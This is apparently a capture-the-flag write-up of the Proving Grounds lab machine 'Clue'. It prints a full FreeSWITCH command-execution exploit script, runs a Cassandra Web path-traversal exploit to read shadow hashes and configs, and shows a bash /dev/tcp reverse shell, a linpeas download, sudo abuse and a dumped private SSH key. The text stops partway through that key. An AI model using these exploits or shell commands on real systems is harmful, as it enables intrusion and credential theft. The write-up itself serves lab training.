Clue
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.209.240
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-09 11:37 EST
Nmap scan report for 192.168.209.240
Host is up, received echo-reply ttl 61 (0.22s latency).
Scanned at 2025-11-09 11:37:01 EST for 102s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGGcX/x/M6J7Y0V8EeUt0FqceuxieEOe2fUH2RsY3XiSxByQWNQi+XSrFElrfjdR2sgnauIWWhWibfD+kTmSP5gkFcaoSsLtgfMP/2G8yuxPSev+9o1N18gZchJneakItNT
az1ltG1W//qJPZDHmkDneyv798f9ZdXBzidtR5/+2ArZd64bldUxx0irH0lNcf+ICuVlhOZyXGvSx/ceMCRozZrW2JQU+WLvs49gC78zZgvN+wrAZ/3s8gKPOIPobN3ObVSkZ+zngt0Xg/Zl11LLAbyWX7TupAt6lTYOvCSwNVZ
URyB1dDdjlMAXqT/Ncr4LbP+tvsiI1BKlqxx4I2r
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCpAb2jUKovAahxmPX9l95Pq9YWgXfIgDJw0obIpOjOkdP3b0ukm/mrTNgX2lg1mQBMlS3lzmQmxeyHGg9+xuJA=
| 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0omUJRIaMtPNYa4CKBC+XUzVyZsJ1QwsksjpA/6Ml+
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3000/tcp open http syn-ack ttl 61 Thin httpd
|_http-title: Cassandra Web
|_http-favicon: Unknown favicon MD5: 68089FD7828CD453456756FE6E7C4FD8
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: thin
8021/tcp open freeswitch-event syn-ack ttl 61 FreeSWITCH mod_event_socket
Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
<snipped>HTTP (80):
If we browsed to this, we will get forbidden:
SMB (445):
List the shares and permissions if we have one:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nxc smb 192.168.209.240 -u '' -p '' --shares
SMB 192.168.209.240 445 CLUE [*] Unix - Samba (name:CLUE) (domain:pg) (signing:False) (SMBv1:True)
SMB 192.168.209.240 445 CLUE [+] pg\:
SMB 192.168.209.240 445 CLUE [*] Enumerated shares
SMB 192.168.209.240 445 CLUE Share Permissions Remark
SMB 192.168.209.240 445 CLUE ----- ----------- ------
SMB 192.168.209.240 445 CLUE print$ Printer Drivers
SMB 192.168.209.240 445 CLUE backup READ Backup web directory shares
SMB 192.168.209.240 445 CLUE IPC$ IPC Service (Samba 4.9.5-Debian)Lets skip this for not.
HTTP (3000):
Here we have cassandra running on port 3000.
HTTP (8021):
Nmap shows that we have freeswitch running on that port, lets search for public exploits:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ searchsploit freeswitch
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit) | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsWe will have one:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ searchsploit -m windows/remote/47799.txt
Exploit: FreeSWITCH 1.10.1 - Command Execution
URL: https://www.exploit-db.com/exploits/47799
Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Clue/47799.txtTry to run it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ cat 47799.txt
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#
#!/usr/bin/python3
from socket import *
import sys
if len(sys.argv) != 3:
print('Missing arguments')
print('Usage: freeswitch-exploit.py <target> <cmd>')
sys.exit(1)
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
response = s.recv(1024)
if b'auth/request' in response:
s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
response = s.recv(1024)
if b'+OK accepted' in response:
print('Authenticated')
s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
response = s.recv(8096).decode()
print(response)
else:
print('Authentication failed')
sys.exit(1)
else:
print('Not prompted for authentication, likely not vulnerable')
sys.exit(1)
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ mv 47799.txt exploit.py
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240
Missing arguments
Usage: freeswitch-exploit.py <target> <cmd>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240 whoami
Authentication failedTry it manually.
First we will grab the default password for freeswitch from the script and connect to the port with nc:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nc -nv 192.168.209.240 8021
(UNKNOWN) [192.168.209.240] 8021 (zope-ftp) open
Content-Type: auth/request
auth ClueCon
Content-Type: command/reply
Reply-Text: -ERR invalid
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/Invalid credentials, so we need to get the correct password for us to be able to get code execution on the target.
Exploitation:
Going back to cassandra, I searched online for CVEs, and found one:
We have path traversal vulnerability.
Pull this with searchsploit:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ searchsploit -m 49362
Exploit: Cassandra Web 0.5.0 - Remote File Read
URL: https://www.exploit-db.com/exploits/49362
Path: /usr/share/exploitdb/exploits/linux/webapps/49362.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Clue/49362.pyRun it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 49362.py -h
usage: 49362.py [-h] [-p PORT] [-f] [-n NUMBER] target file
positional arguments:
target Cassandra Web Host
file eg. /etc/passwd, /proc/sched_debug + /proc/<cass-web-pid>/cmdline
options:
-h, --help show this help message and exit
-p, --port PORT Cassandra Web Port
-f, --force Run the payload even if server isn't Cassandra Web
-n, --number NUMBER Adjust the number of dot-dot-slash
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 49362.py 192.168.209.240 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:106:113::/nonexistent:/usr/sbin/nologin
cassandra:x:107:114:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
cassie:x:1000:1000::/home/cassie:/bin/bash
freeswitch:x:998:998:FreeSWITCH:/var/lib/freeswitch:/bin/false
anthony:x:1001:1001::/home/anthony:/bin/bashThis time I get stuck with that path traversal vulnerability, because I do not what exactly the files resides on that system, so skip this also for a moment.
Lets step back to our smb backup share, and connect to it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ mkdir backup
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ cd backup
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ smbclient -N //192.168.209.240/backup
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 5 04:43:50 2022
.. D 0 Fri Aug 5 04:43:44 2022
freeswitch D 0 Fri Aug 5 04:43:51 2022
cassandra D 0 Fri May 6 11:04:47 2022
14343176 blocks of size 1024. 10598380 blocks availableWe can get the files with mget, or by mounting the share in our kali:
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \freeswitch\usr\bin\tone2wav of size 14512 as freeswitch/usr/bin/tone2wav (18.5 KiloBytes/sec) (average 18.5 KiloBytes/sec)
getting file \freeswitch\usr\bin\fs_ivrd of size 68320 as freeswitch/usr/bin/fs_ivrd (51.0 KiloBytes/sec) (average 39.1 KiloBytes/sec)
getting file \freeswitch\usr\bin\fs_cli of size 98624 as freeswitch/usr/bin/fs_cli (66.9 KiloBytes/sec) (average 50.5 KiloBytes/sec)
<snipped>┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ sudo mount -t cifs //192.168.209.240/backup backup/ -o guest┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ ls
cassandra freeswitchFrom here I searched for passwords, and found only ClueCon which is the default password, so lets grep for that word, and put the files this word is in, then use our path traversal to check if we can get another result (we can also download the github repo of this project and do the same if we did not have access to the source code this way):
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ grep 'ClueCon' freeswitch -nR 2>/dev/null
freeswitch/etc/freeswitch/ivr_menus/new_demo_ivr.xml:21: <entry action="menu-sub" digits="3" param="cluecon_ivr_submenu"/> <!-- ClueCon sub menu -->
freeswitch/etc/freeswitch/ivr_menus/new_demo_ivr.xml:54: <!-- ClueCon IVR Sub Menu -->
freeswitch/etc/freeswitch/ivr_menus/demo_ivr.xml:25: <entry action="menu-exec-app" digits="4" param="transfer 9191 XML default"/> <!-- ClueCon -->
freeswitch/etc/freeswitch/dialplan/default.xml:713: <extension name="ClueCon">
freeswitch/etc/freeswitch/dialplan/default.xml:715: <action application="set" data="effective_caller_id_name=ClueCon IVR"/>
freeswitch/etc/freeswitch/autoload_configs/event_socket.conf.xml:6: <param name="password" value="ClueCon"/>
freeswitch/etc/freeswitch/autoload_configs/erlang_event.conf.xml:12: <param name="cookie" value="ClueCon"/>
freeswitch/etc/freeswitch/autoload_configs/hash.conf.xml:4: <!-- <remote name="Test1" host="10.0.0.10" port="8021" password="ClueCon" interval="1000" /> -->
freeswitch/etc/freeswitch/autoload_configs/event_multicast.conf.xml:11: <!-- <param name="psk" value="ClueCon"/> -->
freeswitch/etc/freeswitch/lang/es/demo/demo-ivr-es-MX.xml:44: <!-- Menu option 4: Register for ClueCon -->
freeswitch/etc/freeswitch/lang/es/demo/demo-ivr-es-ES.xml:44: <!-- Menu option 4: Register for ClueCon -->
freeswitch/etc/freeswitch/lang/en/demo/demo-ivr.xml:42: <!-- Menu option 4: Register for ClueCon -->
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:18: <!-- Menu option 3: To hear about ClueCon -->
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:49: <!-- Menu option 3: To hear about ClueCon -->
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:134: <!-- More information about ClueCon -->
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:138: <!-- Information about ClueCon... -->
freeswitch/etc/freeswitch/lang/pt/demo/demo-ivr-pt-PT.xml:44: <!-- Menu option 4: Register for ClueCon -->
freeswitch/etc/freeswitch/lang/pt/demo/demo-ivr-pt-BR.xml:44: <!-- Menu option 4: Register for ClueCon -->
freeswitch/etc/freeswitch/lang/he/demo/demo-ivr.xml:42: <!-- Menu option 4: Register for ClueCon -->
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ grep 'ClueCon' freeswitch -nR 2>/dev/null | cut -d ':' -f 1 | sed 's|.*\(\/etc/.*\)|\1|'
/etc/freeswitch/ivr_menus/new_demo_ivr.xml
/etc/freeswitch/ivr_menus/new_demo_ivr.xml
/etc/freeswitch/ivr_menus/demo_ivr.xml
/etc/freeswitch/dialplan/default.xml
/etc/freeswitch/dialplan/default.xml
/etc/freeswitch/autoload_configs/event_socket.conf.xml
/etc/freeswitch/autoload_configs/erlang_event.conf.xml
/etc/freeswitch/autoload_configs/hash.conf.xml
/etc/freeswitch/autoload_configs/event_multicast.conf.xml
/etc/freeswitch/lang/es/demo/demo-ivr-es-MX.xml
/etc/freeswitch/lang/es/demo/demo-ivr-es-ES.xml
/etc/freeswitch/lang/en/demo/demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/pt/demo/demo-ivr-pt-PT.xml
/etc/freeswitch/lang/pt/demo/demo-ivr-pt-BR.xml
/etc/freeswitch/lang/he/demo/demo-ivr.xml
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ grep 'ClueCon' freeswitch -nR 2>/dev/null | cut -d ':' -f 1 | sed 's|.*\(\/etc/.*\)|\1|' > brute.txtNow the second step:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ for i in $(cat brute.txt); do python3 49362.py 192.168.209.240 $i; done
<snipped>
<configuration name="event_socket.conf" description="Socket Client">
<settings>
<param name="nat-map" value="false"/>
<param name="listen-ip" value="0.0.0.0"/>
<param name="listen-port" value="8021"/>
<param name="password" value="StrongClueConEight021"/>
</settings>
</configuration>
<snipped>Now lets test this password out again with our freeswitch application:
#!/usr/bin/python3
from socket import *
import sys
if len(sys.argv) != 3:
print('Missing arguments')
print('Usage: freeswitch-exploit.py <target> <cmd>')
sys.exit(1)
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='StrongClueConEight021'
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
response = s.recv(1024)
if b'auth/request' in response:
s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
response = s.recv(1024)
if b'+OK accepted' in response:
print('Authenticated')
s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
response = s.recv(8096).decode()
print(response)
else:
print('Authentication failed')
sys.exit(1)
else:
print('Not prompted for authentication, likely not vulnerable')
sys.exit(1)Run it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240 whoami
Authenticated
Content-Type: api/response
Content-Length: 11
freeswitchWe successfully authenticated, and we have remote command execution.
Get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nc -nlvp 80
listening on [any] 80 ...┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240 'bash -c "bash -i >& /dev/tcp/192.168.45.187/80 0>&1"'
Authenticated┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.209.240] 52678
bash: cannot set terminal process group (533): Inappropriate ioctl for device
bash: no job control in this shell
freeswitch@clue:/$ which python3
/usr/bin/python3
freeswitch@clue:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'
freeswitch@clue:/$ export TERM=xterm
freeswitch@clue:/$ ^Z
zsh: suspended nc -nlvp 80
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ stty -a
speed 38400 baud; rows 43; columns 171; line = 0;
<snipped>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 80
freeswitch@clue:/$ stty rows 43 columns 171
freeswitch@clue:/$Post Exploitation:
Lateral Movement to Cassie:
I uploaded linpeas and found this:
freeswitch@clue:/$ cd /dev/shm
freeswitch@clue:/dev/shm$ curl http://192.168.45.187/linpeas.sh -o linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 949k 100 949k 0 0 823k 0 0:00:01 0:00:01 --:--:-- 823k
freeswitch@clue:/dev/shm$ chmod +x linpeas.sh
freeswitch@clue:/dev/shm$ ./linpeas.sh
<snipped>
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes
root 1 0.0 0.4 103860 10076 ? Ss 11:33 0:00 /sbin/init
<snipped>
cassie 981 0.0 1.6 623504 34428 ? Rsl 11:35 0:01 /usr/bin/ruby2.5 /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330
root 1355 0.0 1.0 48052 21708 ? Ss 11:36 0:00 /usr/sbin/smbd --foreground --no-process-group
<snipped>
<snipped>We can get the same result with ps aux.
freeswitch@clue:/dev/shm$ su cassie
Password: SecondBiteTheApple330
cassie@clue:/dev/shm$Privilege Escalation to Root:
If we went back to our home directory we will find private key for anthony that is the second user on that system:
cassie@clue:/dev/shm$ cd
cassie@clue:~$ ls -la
total 36
drwxr-xr-x 5 cassie cassie 4096 Nov 9 12:31 .
drwxr-xr-x 4 root root 4096 Aug 5 2022 ..
lrwxrwxrwx 1 root root 9 Aug 5 2022 .bash_history -> /dev/null
-rw-r--r-- 1 cassie cassie 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 cassie cassie 3526 Apr 18 2019 .bashrc
drwx------ 3 cassie cassie 4096 Aug 11 2022 .gnupg
-rw------- 1 cassie cassie 1823 Aug 11 2022 id_rsa
drwxrwx--- 3 cassie cassie 4096 Nov 9 12:31 .local
-rw-r--r-- 1 cassie cassie 807 Apr 18 2019 .profile
drwx------ 2 cassie cassie 4096 Aug 11 2022 .ssh
cassie@clue:~$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
<snipped>
-----END OPENSSH PRIVATE KEY-----
cassie@clue:~$ cat id_rsa | grep -v '\-\-' | base64 -d | xxd
00000000: 6f70 656e 7373 682d 6b65 792d 7631 0000 openssh-key-v1..
00000010: 0000 046e 6f6e 6500 0000 046e 6f6e 6500 ...none....none.
00000020: 0000 0000 0000 0100 0001 1700 0000 0773 ...............s
<snipped>
000004f0: 9bf5 69e4 2759 2500 0000 0c61 6e74 686f ..i.'Y%....antho
00000500: 6e79 4063 6c75 6501 0203 0405 0607 ny@clue.......
cassie@clue:~$ ls -la ../anthony/
total 28
drwxr-xr-x 3 anthony anthony 4096 Aug 5 2022 .
drwxr-xr-x 4 root root 4096 Aug 5 2022 ..
-rw------- 1 anthony anthony 120 Aug 5 2022 .bash_history
-rw-r--r-- 1 anthony anthony 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 anthony anthony 3526 Apr 18 2019 .bashrc
-rw-r--r-- 1 anthony anthony 807 Apr 18 2019 .profile
drwx------ 2 anthony anthony 4096 Aug 5 2022 .sshI copied it to my local kali, and tried to authenticate as anthony but could not.
From the output above, we can see .bash_history file that has some values, but only anthony and root can read it.
cassie@clue:~$ sudo -l
Matching Defaults entries for cassie on clue:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cassie may run the following commands on clue:
(ALL) NOPASSWD: /usr/local/bin/cassandra-web
cassie@clue:~$ sudo /usr/local/bin/cassandra-web
I, [2025-11-09T12:39:07.010211 #25228] INFO -- : Establishing control connection
W, [2025-11-09T12:39:07.012976 #25228] WARN -- : Host 127.0.0.1 refused all connections
Cassandra::Errors::AuthenticationError: Server requested authentication, but client was not configured to authenticate
Usage: cassandra-web [options]
-B, --bind BIND ip:port or path for cassandra web to bind on (default: 0.0.0.0:3000)
-H, --hosts HOSTS coma-separated list of cassandra hosts (default: 127.0.0.1)
-P, --port PORT integer port that cassandra is running on (default: 9042)
-L, --log-level LEVEL log level (default: info)
-u, --username USER username to use when connecting to cassandra
-p, --password PASS password to use when connecting to cassandra
-C, --compression NAME compression algorithm to use (lz4 or snappy)
--server-cert PATH server ceritificate pathname
--client-cert PATH client ceritificate pathname
--private-key PATH path to private key
--passphrase SECRET passphrase for the private key
-h, --help Show helpWe can run another cassandra web service on a different port, but this time with sudo privileges, so if we exploited the same path traversal we previously did on port 3000, on our newly created port we can successfully for example view root files or that .bash_history file.
cassie@clue:~$ sudo cassandra-web -u cassie -p SecondBiteTheApple330 -B 1337
I, [2025-11-09T12:56:13.239712 #16117] INFO -- : Establishing control connection
I, [2025-11-09T12:56:13.322105 #16117] INFO -- : Refreshing connected host's metadata
I, [2025-11-09T12:56:13.325311 #16117] INFO -- : Completed refreshing connected host's metadata
I, [2025-11-09T12:56:13.325918 #16117] INFO -- : Refreshing peers metadata
I, [2025-11-09T12:56:13.326946 #16117] INFO -- : Completed refreshing peers metadata
I, [2025-11-09T12:56:13.327004 #16117] INFO -- : Refreshing schema
I, [2025-11-09T12:56:13.352410 #16117] INFO -- : Schema refreshed
I, [2025-11-09T12:56:13.352466 #16117] INFO -- : Control connection established
I, [2025-11-09T12:56:13.352763 #16117] INFO -- : Creating session
I, [2025-11-09T12:56:13.445638 #16117] INFO -- : Session created
2025-11-09 12:56:13 -0500 Thin web server (v1.8.1 codename Infinite Smoothie)
2025-11-09 12:56:13 -0500 Maximum connections set to 1024
2025-11-09 12:56:13 -0500 Listening on 0.0.0.0:1337, CTRL+C to stopFrom another reverse shell, lets try to view some of the protected files:
cassie@clue:~$ curl localhost:1337/../../../../../../../../../etc/shadow --path-as-is
root:$6$kuXiAC8PIOY2uis9$LrTzlkYSlY485ZREBLW5iPSpNxamM38BL85BPmaIAWp05VlV.tdq0EryiFLbLryvbsGTx50dLnMsxIk7PJB5P1:19209:0:99999:7:::
daemon:*:18555:0:99999:7:::
bin:*:18555:0:99999:7:::
sys:*:18555:0:99999:7:::
sync:*:18555:0:99999:7:::
games:*:18555:0:99999:7:::
man:*:18555:0:99999:7:::
lp:*:18555:0:99999:7:::
mail:*:18555:0:99999:7:::
news:*:18555:0:99999:7:::
uucp:*:18555:0:99999:7:::
proxy:*:18555:0:99999:7:::
www-data:*:18555:0:99999:7:::
backup:*:18555:0:99999:7:::
list:*:18555:0:99999:7:::
irc:*:18555:0:99999:7:::
gnats:*:18555:0:99999:7:::
nobody:*:18555:0:99999:7:::
_apt:*:18555:0:99999:7:::
systemd-timesync:*:18555:0:99999:7:::
systemd-network:*:18555:0:99999:7:::
systemd-resolve:*:18555:0:99999:7:::
messagebus:*:18555:0:99999:7:::
sshd:*:18555:0:99999:7:::
systemd-coredump:!!:18555::::::
ntp:*:19209:0:99999:7:::
cassandra:!:19209:0:99999:7:::
cassie:$6$/WeFDwP1CNIN34/z$9woKSLSZhgHw1mX3ou90wnR.i5LHEfeyfHbxu7nYmaZILVrbhHrSeHNGqV0WesuQWGIL7DHEwHKOLK6UX79DI0:19209:0:99999:7:::
freeswitch:!:19209::::::
anthony:$6$01NV0gAhVLOnUHb0$byLv3N95fqVvhut9rbsrYOVzi8QseWfkFl7.VDQ.26a.0IkEVR2TDXoTv/KCMLjUOQZMMpkTUdC3WIyqSWQ.Y1:19209:0:99999:7:::I could not view the id_rsa of the root user, or the root flag.
Lets view the .bash_history file:
cassie@clue:~$ curl localhost:1337/../../../../../../../../../home/anthony/.bash_history --path-as-is
clear
ls -la
ssh-keygen
cp .ssh/id_rsa.pub .ssh/authorized_keys
sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys
exitThis shows that we were able the whole time to authenticate as root to the box with the id_rsa we found previsouly in cassie desktop.
Lets use it to ssh to the box:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y
etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M
mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+
0hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C
gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
